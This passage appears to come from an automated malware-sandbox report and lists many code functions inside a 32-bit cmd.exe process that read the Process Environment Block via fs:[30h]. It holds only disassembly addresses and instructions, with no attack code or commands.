        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03130710 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0313C700 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0317C730 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0313273C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0313273C mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0313C720 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03100750 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03142750 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0318E75D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03184755 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0313674D mov esi, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0313674D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03108770 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03110770 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031A678E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031B47A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031007AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0310C7C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031807C3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031047FB mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0318E7E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031227ED mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03142619 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0311260B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0317E609 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03136620 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03138620 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0311E627 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0310262C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0311C640 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03132674 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031C866E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0313A660 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03104690 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031366B0 mov eax, dword ptr fs:[00000030h]12_2_031366B0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313C6A6 mov eax, dword ptr fs:[00000030h]12_2_0313C6A6
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313A6C7 mov ebx, dword ptr fs:[00000030h]12_2_0313A6C7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313A6C7 mov eax, dword ptr fs:[00000030h]12_2_0313A6C7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317E6F2 mov eax, dword ptr fs:[00000030h]12_2_0317E6F2
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317E6F2 mov eax, dword ptr fs:[00000030h]12_2_0317E6F2
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317E6F2 mov eax, dword ptr fs:[00000030h]12_2_0317E6F2
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317E6F2 mov eax, dword ptr fs:[00000030h]12_2_0317E6F2
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031806F1 mov eax, dword ptr fs:[00000030h]12_2_031806F1
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031806F1 mov eax, dword ptr fs:[00000030h]12_2_031806F1
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03196500 mov eax, dword ptr fs:[00000030h]12_2_03196500
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D4500 mov eax, dword ptr fs:[00000030h]12_2_031D4500
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D4500 mov eax, dword ptr fs:[00000030h]12_2_031D4500
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D4500 mov eax, dword ptr fs:[00000030h]12_2_031D4500
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D4500 mov eax, dword ptr fs:[00000030h]12_2_031D4500
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D4500 mov eax, dword ptr fs:[00000030h]12_2_031D4500
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D4500 mov eax, dword ptr fs:[00000030h]12_2_031D4500
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D4500 mov eax, dword ptr fs:[00000030h]12_2_031D4500
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110535 mov eax, dword ptr fs:[00000030h]12_2_03110535
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110535 mov eax, dword ptr fs:[00000030h]12_2_03110535
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110535 mov eax, dword ptr fs:[00000030h]12_2_03110535
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110535 mov eax, dword ptr fs:[00000030h]12_2_03110535
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110535 mov eax, dword ptr fs:[00000030h]12_2_03110535
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110535 mov eax, dword ptr fs:[00000030h]12_2_03110535
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312E53E mov eax, dword ptr fs:[00000030h]12_2_0312E53E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312E53E mov eax, dword ptr fs:[00000030h]12_2_0312E53E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312E53E mov eax, dword ptr fs:[00000030h]12_2_0312E53E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312E53E mov eax, dword ptr fs:[00000030h]12_2_0312E53E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312E53E mov eax, dword ptr fs:[00000030h]12_2_0312E53E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03108550 mov eax, dword ptr fs:[00000030h]12_2_03108550
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03108550 mov eax, dword ptr fs:[00000030h]12_2_03108550
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313656A mov eax, dword ptr fs:[00000030h]12_2_0313656A
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313656A mov eax, dword ptr fs:[00000030h]12_2_0313656A
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313656A mov eax, dword ptr fs:[00000030h]12_2_0313656A
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313E59C mov eax, dword ptr fs:[00000030h]12_2_0313E59C
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03102582 mov eax, dword ptr fs:[00000030h]12_2_03102582
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03102582 mov ecx, dword ptr fs:[00000030h]12_2_03102582
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03134588 mov eax, dword ptr fs:[00000030h]12_2_03134588
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031245B1 mov eax, dword ptr fs:[00000030h]12_2_031245B1
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031245B1 mov eax, dword ptr fs:[00000030h]12_2_031245B1
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031805A7 mov eax, dword ptr fs:[00000030h]12_2_031805A7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031805A7 mov eax, dword ptr fs:[00000030h]12_2_031805A7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031805A7 mov eax, dword ptr fs:[00000030h]12_2_031805A7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031065D0 mov eax, dword ptr fs:[00000030h]12_2_031065D0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313A5D0 mov eax, dword ptr fs:[00000030h]12_2_0313A5D0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313A5D0 mov eax, dword ptr fs:[00000030h]12_2_0313A5D0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313E5CF mov eax, dword ptr fs:[00000030h]12_2_0313E5CF
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313E5CF mov eax, dword ptr fs:[00000030h]12_2_0313E5CF
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031025E0 mov eax, dword ptr fs:[00000030h]12_2_031025E0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312E5E7 mov eax, dword ptr fs:[00000030h]12_2_0312E5E7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312E5E7 mov eax, dword ptr fs:[00000030h]12_2_0312E5E7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312E5E7 mov eax, dword ptr fs:[00000030h]12_2_0312E5E7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312E5E7 mov eax, dword ptr fs:[00000030h]12_2_0312E5E7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312E5E7 mov eax, dword ptr fs:[00000030h]12_2_0312E5E7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312E5E7 mov eax, dword ptr fs:[00000030h]12_2_0312E5E7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312E5E7 mov eax, dword ptr fs:[00000030h]12_2_0312E5E7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312E5E7 mov eax, dword ptr fs:[00000030h]12_2_0312E5E7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313C5ED mov eax, dword ptr fs:[00000030h]12_2_0313C5ED
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313C5ED mov eax, dword ptr fs:[00000030h]12_2_0313C5ED
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03138402 mov eax, dword ptr fs:[00000030h]12_2_03138402
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03138402 mov eax, dword ptr fs:[00000030h]12_2_03138402
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03138402 mov eax, dword ptr fs:[00000030h]12_2_03138402
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030FC427 mov eax, dword ptr fs:[00000030h]12_2_030FC427
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030FE420 mov eax, dword ptr fs:[00000030h]12_2_030FE420
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030FE420 mov eax, dword ptr fs:[00000030h]12_2_030FE420
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030FE420 mov eax, dword ptr fs:[00000030h]12_2_030FE420
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03186420 mov eax, dword ptr fs:[00000030h]12_2_03186420
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03186420 mov eax, dword ptr fs:[00000030h]12_2_03186420
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03186420 mov eax, dword ptr fs:[00000030h]12_2_03186420
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03186420 mov eax, dword ptr fs:[00000030h]12_2_03186420
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03186420 mov eax, dword ptr fs:[00000030h]12_2_03186420
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03186420 mov eax, dword ptr fs:[00000030h]12_2_03186420
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03186420 mov eax, dword ptr fs:[00000030h]12_2_03186420
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312245A mov eax, dword ptr fs:[00000030h]12_2_0312245A
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031BA456 mov eax, dword ptr fs:[00000030h]12_2_031BA456
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313E443 mov eax, dword ptr fs:[00000030h]12_2_0313E443
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313E443 mov eax, dword ptr fs:[00000030h]12_2_0313E443
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313E443 mov eax, dword ptr fs:[00000030h]12_2_0313E443
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313E443 mov eax, dword ptr fs:[00000030h]12_2_0313E443
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313E443 mov eax, dword ptr fs:[00000030h]12_2_0313E443
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313E443 mov eax, dword ptr fs:[00000030h]12_2_0313E443
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313E443 mov eax, dword ptr fs:[00000030h]12_2_0313E443
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313E443 mov eax, dword ptr fs:[00000030h]12_2_0313E443
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030F645D mov eax, dword ptr fs:[00000030h]12_2_030F645D
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312A470 mov eax, dword ptr fs:[00000030h]12_2_0312A470
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312A470 mov eax, dword ptr fs:[00000030h]12_2_0312A470
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312A470 mov eax, dword ptr fs:[00000030h]12_2_0312A470
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318C460 mov ecx, dword ptr fs:[00000030h]12_2_0318C460
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031BA49A mov eax, dword ptr fs:[00000030h]12_2_031BA49A
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031344B0 mov ecx, dword ptr fs:[00000030h]12_2_031344B0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318A4B0 mov eax, dword ptr fs:[00000030h]12_2_0318A4B0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031064AB mov eax, dword ptr fs:[00000030h]12_2_031064AB
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031004E5 mov ecx, dword ptr fs:[00000030h]12_2_031004E5
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317EB1D mov eax, dword ptr fs:[00000030h]12_2_0317EB1D
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317EB1D mov eax, dword ptr fs:[00000030h]12_2_0317EB1D
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317EB1D mov eax, dword ptr fs:[00000030h]12_2_0317EB1D
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317EB1D mov eax, dword ptr fs:[00000030h]12_2_0317EB1D
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317EB1D mov eax, dword ptr fs:[00000030h]12_2_0317EB1D
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317EB1D mov eax, dword ptr fs:[00000030h]12_2_0317EB1D
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317EB1D mov eax, dword ptr fs:[00000030h]12_2_0317EB1D
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317EB1D mov eax, dword ptr fs:[00000030h]12_2_0317EB1D
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317EB1D mov eax, dword ptr fs:[00000030h]12_2_0317EB1D
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D4B00 mov eax, dword ptr fs:[00000030h]12_2_031D4B00
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312EB20 mov eax, dword ptr fs:[00000030h]12_2_0312EB20
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312EB20 mov eax, dword ptr fs:[00000030h]12_2_0312EB20
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031C8B28 mov eax, dword ptr fs:[00000030h]12_2_031C8B28
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031C8B28 mov eax, dword ptr fs:[00000030h]12_2_031C8B28
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031AEB50 mov eax, dword ptr fs:[00000030h]12_2_031AEB50
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D2B57 mov eax, dword ptr fs:[00000030h]12_2_031D2B57
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D2B57 mov eax, dword ptr fs:[00000030h]12_2_031D2B57
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D2B57 mov eax, dword ptr fs:[00000030h]12_2_031D2B57
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D2B57 mov eax, dword ptr fs:[00000030h]12_2_031D2B57
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031B4B4B mov eax, dword ptr fs:[00000030h]12_2_031B4B4B
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031B4B4B mov eax, dword ptr fs:[00000030h]12_2_031B4B4B
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031A8B42 mov eax, dword ptr fs:[00000030h]12_2_031A8B42
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03196B40 mov eax, dword ptr fs:[00000030h]12_2_03196B40
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03196B40 mov eax, dword ptr fs:[00000030h]12_2_03196B40
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031CAB40 mov eax, dword ptr fs:[00000030h]12_2_031CAB40
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030F8B50 mov eax, dword ptr fs:[00000030h]12_2_030F8B50
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030FCB7E mov eax, dword ptr fs:[00000030h]12_2_030FCB7E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031B4BB0 mov eax, dword ptr fs:[00000030h]12_2_031B4BB0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031B4BB0 mov eax, dword ptr fs:[00000030h]12_2_031B4BB0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110BBE mov eax, dword ptr fs:[00000030h]12_2_03110BBE
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110BBE mov eax, dword ptr fs:[00000030h]12_2_03110BBE
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031AEBD0 mov eax, dword ptr fs:[00000030h]12_2_031AEBD0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03120BCB mov eax, dword ptr fs:[00000030h]12_2_03120BCB
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03120BCB mov eax, dword ptr fs:[00000030h]12_2_03120BCB
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03120BCB mov eax, dword ptr fs:[00000030h]12_2_03120BCB
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03100BCD mov eax, dword ptr fs:[00000030h]12_2_03100BCD
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03100BCD mov eax, dword ptr fs:[00000030h]12_2_03100BCD
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03100BCD mov eax, dword ptr fs:[00000030h]12_2_03100BCD
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03108BF0 mov eax, dword ptr fs:[00000030h]12_2_03108BF0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03108BF0 mov eax, dword ptr fs:[00000030h]12_2_03108BF0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03108BF0 mov eax, dword ptr fs:[00000030h]12_2_03108BF0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318CBF0 mov eax, dword ptr fs:[00000030h]12_2_0318CBF0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312EBFC mov eax, dword ptr fs:[00000030h]12_2_0312EBFC
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318CA11 mov eax, dword ptr fs:[00000030h]12_2_0318CA11
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03124A35 mov eax, dword ptr fs:[00000030h]12_2_03124A35
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03124A35 mov eax, dword ptr fs:[00000030h]12_2_03124A35
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313CA24 mov eax, dword ptr fs:[00000030h]12_2_0313CA24
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312EA2E mov eax, dword ptr fs:[00000030h]12_2_0312EA2E
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03106A50 mov eax, dword ptr fs:[00000030h]12_2_03106A50
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03106A50 mov eax, dword ptr fs:[00000030h]12_2_03106A50
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03106A50 mov eax, dword ptr fs:[00000030h]12_2_03106A50
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03106A50 mov eax, dword ptr fs:[00000030h]12_2_03106A50
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03106A50 mov eax, dword ptr fs:[00000030h]12_2_03106A50
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03106A50 mov eax, dword ptr fs:[00000030h]12_2_03106A50
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03106A50 mov eax, dword ptr fs:[00000030h]12_2_03106A50
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110A5B mov eax, dword ptr fs:[00000030h]12_2_03110A5B
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03110A5B mov eax, dword ptr fs:[00000030h]12_2_03110A5B
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317CA72 mov eax, dword ptr fs:[00000030h]12_2_0317CA72
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317CA72 mov eax, dword ptr fs:[00000030h]12_2_0317CA72
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031AEA60 mov eax, dword ptr fs:[00000030h]12_2_031AEA60
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313CA6F mov eax, dword ptr fs:[00000030h]12_2_0313CA6F
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313CA6F mov eax, dword ptr fs:[00000030h]12_2_0313CA6F
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313CA6F mov eax, dword ptr fs:[00000030h]12_2_0313CA6F
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03138A90 mov edx, dword ptr fs:[00000030h]12_2_03138A90
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310EA80 mov eax, dword ptr fs:[00000030h]12_2_0310EA80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310EA80 mov eax, dword ptr fs:[00000030h]12_2_0310EA80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310EA80 mov eax, dword ptr fs:[00000030h]12_2_0310EA80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310EA80 mov eax, dword ptr fs:[00000030h]12_2_0310EA80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310EA80 mov eax, dword ptr fs:[00000030h]12_2_0310EA80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310EA80 mov eax, dword ptr fs:[00000030h]12_2_0310EA80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310EA80 mov eax, dword ptr fs:[00000030h]12_2_0310EA80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310EA80 mov eax, dword ptr fs:[00000030h]12_2_0310EA80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310EA80 mov eax, dword ptr fs:[00000030h]12_2_0310EA80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D4A80 mov eax, dword ptr fs:[00000030h]12_2_031D4A80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03108AA0 mov eax, dword ptr fs:[00000030h]12_2_03108AA0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03108AA0 mov eax, dword ptr fs:[00000030h]12_2_03108AA0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03156AA4 mov eax, dword ptr fs:[00000030h]12_2_03156AA4
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03100AD0 mov eax, dword ptr fs:[00000030h]12_2_03100AD0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03134AD0 mov eax, dword ptr fs:[00000030h]12_2_03134AD0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03134AD0 mov eax, dword ptr fs:[00000030h]12_2_03134AD0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03156ACC mov eax, dword ptr fs:[00000030h]12_2_03156ACC
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03156ACC mov eax, dword ptr fs:[00000030h]12_2_03156ACC
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03156ACC mov eax, dword ptr fs:[00000030h]12_2_03156ACC
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313AAEE mov eax, dword ptr fs:[00000030h]12_2_0313AAEE
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313AAEE mov eax, dword ptr fs:[00000030h]12_2_0313AAEE
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318C912 mov eax, dword ptr fs:[00000030h]12_2_0318C912
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030F8918 mov eax, dword ptr fs:[00000030h]12_2_030F8918
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030F8918 mov eax, dword ptr fs:[00000030h]12_2_030F8918
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317E908 mov eax, dword ptr fs:[00000030h]12_2_0317E908
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317E908 mov eax, dword ptr fs:[00000030h]12_2_0317E908
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318892A mov eax, dword ptr fs:[00000030h]12_2_0318892A
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0319892B mov eax, dword ptr fs:[00000030h]12_2_0319892B
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D4940 mov eax, dword ptr fs:[00000030h]12_2_031D4940
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03180946 mov eax, dword ptr fs:[00000030h]12_2_03180946
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031A4978 mov eax, dword ptr fs:[00000030h]12_2_031A4978
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031A4978 mov eax, dword ptr fs:[00000030h]12_2_031A4978
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318C97C mov eax, dword ptr fs:[00000030h]12_2_0318C97C
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03126962 mov eax, dword ptr fs:[00000030h]12_2_03126962
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03126962 mov eax, dword ptr fs:[00000030h]12_2_03126962
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03126962 mov eax, dword ptr fs:[00000030h]12_2_03126962
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0314096E mov eax, dword ptr fs:[00000030h]12_2_0314096E
